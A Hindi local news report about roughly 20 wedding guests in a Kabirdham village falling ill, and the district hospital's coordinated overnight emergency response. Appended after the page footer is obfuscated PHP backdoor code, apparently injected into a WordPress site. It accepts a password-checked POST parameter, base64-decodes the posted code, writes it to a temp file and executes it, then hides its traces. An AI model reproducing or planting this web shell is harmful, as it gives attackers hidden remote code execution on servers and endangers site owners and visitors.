कवर्धाछत्तीसगढ़

शादी घर में एक साथ 20 से अधिक बीमार, सुझबुझ से जिला चिकित्सालय लाया गया,हुआ समुचित उपचार

कवर्धा:  रात्री 2.30 बजे आपातकालीन विभाग जिला चिकित्सालय कबीरधाम में ग्राम खदोड़ा खुर्द रबेली से साहु परिवार के लगभग 20 लोग उल्टी एवम पेट दर्द की शिकायत लेकर आए मरीजों का तत्काल उपचार ज़िला चिकित्सालय के प्रभारी आरएमओ डॉक्टर राकेश कुमार के त्वरित कार्यवाही एवम कुशल प्रबंधन क्षमता की का परिचय देते हुए किया गया।

उक्त बड़े पैमाने के आपातकालीन परिस्थिति मे जब साहु परिवार के लोग जिनके घर में उनकी सुपुत्री का विवाह कार्यक्रम संपन्न हो रहा था और बाराती आए हुए थे , उनके घर के बच्चे और अन्य ग्रामीण बच्चे एवम महिलाएं अचानक उल्टी एवम पेट दर्द की शिकायत करने लगे। परिजनों के द्वारा आनन फानन में स्वयं के साधन से सभी प्रभावितों को जिला चिकित्सालय लाया गया।

आपातकालीन ड्यूटी में उपस्थित चिकित्सक डॉक्टर गरिमा साहु एवम डॉक्टर वनीत कौर ने कि इतने सारे मरीजों के त्वरित उपचार हेतु आपातकालीन विभाग के प्रभारी एवम आरएमओ डॉक्टर राकेश कुमार प्रेमी को दूरभाष से सूचना दी। आरएमओ डॉक्टर राकेश ने त्वरित हॉस्पिटल पहुंचते हुए स्थिति को अपने नियंत्रण में लिया, चूंकि सभी मरीजों को एक ही तरह के लक्षण थे अतः सभी के ईलाज में एक ही प्रकार की दवाइयों का उपयोग होना था अतः उन्होंने एक ट्रीटमेंट प्रोटोकाल बनाया, चिकित्सकों एवम नर्सिंग स्टॉफ की मीटिंग ली, परिसर में निवासरत चिकित्सक डॉक्टर अनुष्का मिश्रा एवम नर्सिंग ऑफिसर विवेक खाखा को कॉल करके बुलाया, एवम इलाज की प्रक्रिया एवम दवाईयों के बारे में अवगत कराए, मरीजों को उपलब्ध बिस्तर के अनुरुप अलग अलग वार्ड में भर्ती की समझाइश दी गई तथा त्वरित उपचार सुनिश्चित किया गया जिससे लगभग 30 मिनट के भीतर सभी मरीजों को आराम मिलना प्रारंभ हो गया।

समस्या अभी समाप्त नहीं हुई थी क्योंकि ग्राम खदोड़ा खुर्द से खबर आ रही थी की ओर मरीज हैं जो उक्त समस्या से प्रभावित हैं और उन सभी को भी त्वरित उपचार प्रदान किया जाना हैं लेकिन सभी मरीजों को हॉस्पिटल तक लाना और जिला चिकित्सालय जो वर्तमान में अपनी क्षमता से अधिक मरीजों को भर्ती कर उपचार कर रहा है, ऐसे में सभी प्रभावितों को जिला चिकित्सालय में लाकर इलाज किया जाना उचित नही समझते हुए डॉक्टर राकेश कुमार ने अपनी कुशल प्रबंधन क्षमता का परिचय देते हुए विकासखंड पिपरिया के बीएमओ से संपर्क करने का प्रयास किया। संपर्क नहीं होने पर तुरंत बीएमओ बोडला डॉक्टर विवेक चंद्रवंशी से संपर्क किया।

डॉक्टर विवेक चंद्रवंशी ने उनका बखूबी साथ दिया। उसी समय डॉक्टर राकेश ने अर्बन पीएचसी कवर्धा में पदस्थ आर एम ए शिव गोपाल से संपर्क किया और रैपिड रिस्पॉन्स हेतु पीएचसी राबेली के प्रभारी नितिन दुबे एवम गेमेश चौधरी से संपर्क किया और आरआरटी ( रेपिड रिस्पॉन्स टीम) को विवाह घर पहुंचने हेतु निर्देशित किया।

प्रभावितों के परिजनों में घबराहट और व्याकुलता को भांपते हुए डॉक्टर राकेश ने सभी परिजनों को आश्वस्त किया और तत्काल परिजनों का कांटेक्ट नंबर लेकर एक वॉट्सएप ग्रुप बनाया एवम ऑडियो रिकोडिंग भेजते हुए चिकिस्कीय टीम को आवश्यक सूचना दी तथा परिवार जनों को त्वरित उपचार का भरोसा दिलाया। वॉट्सएप ग्रुप में टीम के सभी सदस्य अपनी उपस्थिति एवम अन्य सूचना का प्रसारण किए, टीम के घर पहुंचने की सूचना का फोटो  दुर्गेश साहु जी ने ग्रुप में दी।

जब टीम घर पहुंच गई और सभी को उपचार मिलने लगा तो सब ने राहत की सांस ली। सभी मरीजों को लगभग आधे घंटे के भीतर आराम मिलने लगा और सुबह 6 बजे तक छुट्टी कर दी गई और घर में विवाह का बचा कार्यक्रम संपन्न हुआ। उक्त बड़े पैमाने के आपातकालीन एपिडेमिक को जिला चिकित्सालय के चिकित्सकों और नर्सिंग ऑफिसरों की टीम वार्ड बॉय, सुरक्षा कर्मी एवम अन्य सहयोगी कर्मचारियों के द्वारा बडे़ आसानी से मैनेज किया गया। बीएमओ बोडला डॉक्टर विवेक चंद्रवंशी, बीएमओ पिपरिया डॉक्टर विनोद चंद्रवंशी ने भी त्वरित कार्यवाही करते हुए अपनी चिकित्सकीय क्षमता एवम संवेदनशीलता का परिचय दिया।

टीम के द्वारा ग्राम खदोड़ा खुर्द में लगभग 12 वर्ग लोगों को इंजेक्शन और ड्रिप लगाकर उपचार किया गया, तथा पंचायत भवन में अस्थाई कैंप लगाकर अन्य प्रभावितों हेतु चिकित्सा सुविधा सुनिश्चित की गई। मितानिनों के माध्यम से घर घर जाकर जानकारी ली गई एवम लोगों को कैंप की सूचना दी गई।

उक्त कार्य में ब्लॉक स्तर से नितिन दुबे, गेमेष चौधरी, दिलीप राठौर, दुर्गेश भास्कर, बीरेंद्र, ममता सिस्टर, संतोषी सिस्टर, संजय एवम प्रज्ञा का विशेष योगदान रहा। एवम जिला चिकित्सालय की टीम में चिकित्सकों के अलावा श्रीमती पेमेश्वरी सिस्टर, सुभद्रा सिस्टर, हेमलता साहु सिस्टर, प्रदीप पैंकरा, भरत राय वार्ड बॉय , गोकुल साहु, सुरक्षा कर्मी मनीष कुर्रे एवम जागेश्वर लांझी का सराहनीय योगदान रहा। उक्त घटना क्रम में मरीजों के परिजनों  दुर्गेश साहु  एवम सुरेंद्र साहु  ने जो स्वास्थ्य विभाग पर विश्वास जताया तथा शालीनता का परिचय देते हुए सहयोग किया , वह भी सराहनीय है। आज प्रातः से मुख्य चिकित्सा एवम स्वास्थ्य अधिकारी डाक्टर बी एल राज सर के द्वारा उक्त ग्राम में स्थित के नियंत्रण हेतु दो दिवस के लिए स्वास्थ्य शिविर लगाए जानें हेतु आदेशित किया गया है, आईडीएसपी शाखा के द्वारा एपिडेमिक रिपोर्ट तैयार किया जा रहा है एवम अन्य सभी आवश्यक प्रयास किए जा रहे हैं, अभी स्थिती एकदम नियंत्रण में है।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}